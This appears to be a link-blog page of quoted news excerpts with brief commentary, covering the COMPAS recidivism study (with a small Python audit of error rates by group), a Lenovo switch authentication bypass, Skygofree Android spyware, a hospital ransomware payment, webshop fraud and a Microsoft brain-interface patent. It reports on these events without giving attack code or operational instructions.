Although the data used by COMPAS do not include an individual’s race, other aspects of the data may be correlated to race that can lead to racial disparities in the predictions. In May 2016, writing for ProPublica, Angwin et al. (2) analyzed the efficacy of COMPAS on more than 7000 individuals arrested in Broward County, Florida between 2013 and 2014. This analysis indicated that the predictions were unreliable and racially biased. COMPAS’s overall accuracy for white defendants is 67.0%, only slightly higher than its accuracy of 63.8% for black defendants. The mistakes made by COMPAS, however, affected black and white defendants differently: Black defendants who did not recidivate were incorrectly predicted to reoffend at a rate of 44.9%, nearly twice as high as their white counterparts at 23.5%; and white defendants who did recidivate were incorrectly predicted to not reoffend at a rate of 47.7%, nearly twice as high as their black counterparts at 28.0%. In other words, COMPAS scores appeared to favor white defendants over black defendants by underpredicting recidivism for white and overpredicting recidivism for black defendants.
[…]
We have shown that commercial software that is widely used to predict recidivism is no more accurate or fair than the predictions of people with little to no criminal justice expertise who responded to an online survey.
[…]
Although Northpointe does not reveal the details of their COMPAS software, we have shown that their prediction algorithm is equivalent to a simple linear classifier. In addition, despite the impressive sounding use of 137 features, it would appear that a linear classifier based on only 2 features—age and total number of previous convictions—is all that is required to yield the same prediction accuracy as COMPAS.

The question of accurate prediction of recidivism is not limited to COMPAS. A review of nine different algorithmic approaches to predicting recidivism found that eight of the nine approaches failed to make accurate predictions (including COMPAS) (13). In addition, a meta-analysis of nine algorithmic approaches found only moderate levels of predictive accuracy across all approaches and concluded that these techniques should not be solely used for criminal justice decision-making, particularly in decisions of preventative detention
[…]
When considering using software such as COMPAS in making decisions that will significantly affect the lives and well-being of criminal defendants, it is valuable to ask whether we would put these decisions in the hands of random people who respond to an online survey because, in the end, the results from these two approaches appear to be indistinguishable.

Source: The accuracy, fairness, and limits of predicting recidivism | Science Advances
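The quoted analysis hinges on a point that an accuracy figure alone hides: two groups can have near-equal accuracy while the errors fall in opposite directions (false positives for one group, false negatives for the other). The following is an added example, not code from the paper or from ProPublica; it runs a per-group error-rate audit over a small constructed dataset (not Broward County records) and flags metrics whose gap between groups exceeds a tolerance.

```python
"""Group-wise error-rate audit for a binary risk classifier (added example)."""
from collections import defaultdict

# Constructed toy records: (group, actually_reoffended, predicted_to_reoffend).
# Chosen so both groups get the same accuracy but mirrored error types.
SAMPLE = [
    ("white", 0, 0), ("white", 0, 0), ("white", 0, 0), ("white", 0, 1),
    ("white", 1, 1), ("white", 1, 0), ("white", 1, 0), ("white", 1, 1),
    ("black", 0, 0), ("black", 0, 1), ("black", 0, 1), ("black", 0, 0),
    ("black", 1, 1), ("black", 1, 1), ("black", 1, 1), ("black", 1, 0),
]


def confusion_by_group(records):
    """Tally TP/FP/TN/FN separately for each group."""
    counts = defaultdict(lambda: {"tp": 0, "fp": 0, "tn": 0, "fn": 0})
    for group, actual, predicted in records:
        cell = counts[group]
        if actual and predicted:
            cell["tp"] += 1
        elif actual and not predicted:
            cell["fn"] += 1
        elif not actual and predicted:
            cell["fp"] += 1
        else:
            cell["tn"] += 1
    return dict(counts)


def error_rates(c):
    """Accuracy plus the two error rates the ProPublica analysis compared."""
    total = sum(c.values())
    return {
        "accuracy": (c["tp"] + c["tn"]) / total,
        # false positive rate: non-recidivists wrongly flagged as likely to reoffend
        "fpr": c["fp"] / (c["fp"] + c["tn"]),
        # false negative rate: recidivists wrongly predicted not to reoffend
        "fnr": c["fn"] / (c["fn"] + c["tp"]),
    }


def audit(records, tolerance=0.10):
    """Return per-group rates and the list of metrics whose inter-group gap exceeds tolerance."""
    rates = {g: error_rates(c) for g, c in confusion_by_group(records).items()}
    flags = []
    for metric in ("fpr", "fnr"):
        values = [rates[g][metric] for g in sorted(rates)]
        if max(values) - min(values) > tolerance:
            flags.append(metric)
    return rates, flags
```

On the constructed sample both groups score 62.5% accuracy, yet the false positive rate is twice as high for one group and the false negative rate twice as high for the other, so the audit flags both metrics.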

Lenovo inherited a switch authentication bypass

Lenovo has patched an ancient vulnerability in switches that it acquired along with IBM’s hardware businesses and which Big Blue itself acquired when it slurped parts of Nortel.

The bug, which Lenovo refers to as “HP backdoor”, for reasons it has not explained, has been present in ENOS (Enterprise Network Operating System) since at least 2004 – when ENOS was still under the hand of Nortel.

Lenovo’s advisory says the issue “was discovered during a Lenovo security audit in the Telnet and Serial Console management interfaces, as well as the SSH and Web management interfaces under certain limited and unlikely conditions”.

There are three vulnerable scenarios, the advisory said:

Authentication via the Telnet or serial consoles, if used for local authentication, “or a combination of RADIUS, TACACS+, or LDAP and local authentication under specific circumstances”;
The Web management interface is vulnerable when the user is authenticating via “a combination of RADIUS or TACACS+ and local authentication”, and then only in “an unlikely condition”; and
“SSH for certain firmware released in May 2004 through June 2004”, again with a combination of RADIUS or TACACS+.

The “unlikely conditions” Lenovo referred to depend on which interface is potentially being attacked.

For SSH access, the management interface is only vulnerable if the system is running firmware created between May and June 2004; RADIUS and/or TACACS+ is enabled; the related “backdoor / secure backdoor” local authentication fallback is enabled (in this case, “backdoor” refers to a RADIUS configuration setting); and finally, a RADIUS or TACACS+ timeout occurs.

Source: Lenovo inherited a switch authentication bypass – from Nortel • The Register

Asus Bezel-Free Kit uses illusion to hide bezels in multimonitor setups

The concept is simple. Thin lenses are placed along the seams where screens meet; they contain optical micro-structures that refract light, bending it inward to hide the bezels underneath.
[…]
The kit’s optical obfuscation is designed to work at a specific angle. We selected 130° because it offered the best balance of comfort and immersion in internal testing. Proper fit and alignment are extremely important, so the lenses and associated mounting hardware are made for specific monitors.

Source: Bezel-Free Kit makes multi-monitor setups seamless | ROG – Republic of Gamers Global

OnePlus suspends credit card transactions after fraud

Over the weekend, members of the OnePlus community reported cases of unknown credit card transactions occurring on their credit cards post purchase from oneplus.net. We immediately began to investigate as a matter of urgency, and will keep you updated.
[…]
As a precaution, we are temporarily disabling credit card payments at oneplus.net. PayPal is still available, and we are exploring alternative secure payment options with our service providers.

Source: An Update on Credit Card Security – OnePlus Forums

With the camera problems and data being sent quietly to a Chinese server, OnePlus is not exactly inspiring confidence, which is a shame after such successful and valuable launch products in the Android space.

Skygofree: Serious offensive Android malware, since 2014

At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014. Since then, the implant’s functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals.
[…]
The implant provides the ability to grab a lot of exfiltrated data, like call records, text messages, geolocation, surrounding audio, calendar events, and other memory information stored on the device.
[…]
In the latest implant versions there are 48 different commands. You can find a full list with short descriptions in the Appendix. Here are some of the most notable:

‘geofence’ – this command adds a specified location to the implant’s internal database and when it matches a device’s current location the malware triggers and begins to record surrounding audio.

‘social’ – this command starts the ‘AndroidMDMSupport’ service, which allows the files of any other installed application to be grabbed.

‘wifi’ – this command creates a new Wi-Fi connection with the configuration specified in the command and enables Wi-Fi if it is disabled.

‘camera’ – this command records a video or captures a photo using the front-facing camera when someone next unlocks the device.

Source: Skygofree: Following in the footsteps of HackingTeam – Securelist

Hospital injects $60,000 into crims’ coffers to cure malware infection

The crooks had infected the network of Hancock Health, in Indiana, with the Samsam software nasty, which scrambled files and demanded payment to recover the documents. The criminals broke in around 9.30pm on January 11 after finding a box with an exploitable Remote Desktop Protocol (RDP) server, and injected their ransomware into connected computers.

Medical IT teams were alerted in early 2016 that hospitals were being targeted by Samsam, although it appears the warnings weren’t heeded in this case.

According to the hospital, the malware spread over the network and was able to encrypt “a number of the hospital’s information systems,” reducing staff to scratching out patient notes on pieces of dead tree.
[…]
The ransomware’s masters accepted the payment, and sent over the decryption keys to unlock the data. As of Monday this week, the hospital said critical systems were up and running and normal services have been resumed.

This doesn’t appear to be a data heist. The hospital claimed no digital patient records were taken from its computers, just made inaccessible. “The life-sustaining and support systems of the hospital remained unaffected during the ordeal, and patient safety was never at risk,” the healthcare provider argued.
[…]
It’s one thing to keep an offline store of sensitive data to prevent ransomware on the network from attacking it. It’s another to keep those backups somewhere so out of reach, they can’t be recovered during a crisis, effectively rendering them useless.

It just proves that when planning disaster recovery, you must consider time-to-restoration as well as the provisioning of backup hardware.

Source: Hospital injects $60,000 into crims’ coffers to cure malware infection • The Register

300 Dutch customers fell for fake popular website ring. Perps picked up and given a few months of prison time.

BCC and MediaMarkt are large electronics stores in NL. Ziggo is a large internet ISP. By linking to fake pages through marktplaats.nl (the Dutch eBay / Craigslist equivalent) people were able to shop for products on the fake sites, which were never delivered. Using a chat interface, the crims tried to gain access to the bank accounts of the marks. It very much surprises me that this kind of fraud only results in a few months in jail.

A number of men have each been sentenced to several months in prison for large-scale internet fraud. They made their money mainly from counterfeit webshops imitating, among others, BCC, MediaMarkt and Ziggo.

Source: Gevangenisstraf voor internetoplichting – Emerce

Microsoft wants to patent mind control – show how stupid the patent system really is

Microsoft has applied to patent a brain control interface, so you’ll be able to “think” your way around a computer device, hands free. Last year, Facebook claimed to have 60 engineers engaged in BCI [brain computer interface] but Microsoft isn’t going to take this sitting down. It’s erm, sitting down and thinking really hard. The application Changing an application state using neurological data was filed last year, and published last week. The inventors recently filed a related patent for a continuous motion controller powered by the brain. (US 2017/0329392: Continuous Motion Controls Operable Using Neurological Data).

Source: Microsoft wants to patent mind control • The Register


The problem is that the actual technology to do this doesn’t exist and they have nothing like a working prototype. Considering brain control has existed for some time, it’s a bit silly that this kind of conceptual work can actually be patented by someone with money. I can come up with loads of patentable ideas, but the bridge to creating some sort of working product is one too far for me. And the costs of patenting all my imaginations are far too high. This system basically puts small inventors at a huge disadvantage, but also pushes out innovation by small companies as they find that technologies they have invented and worked out are suddenly patented after the fact by large companies.
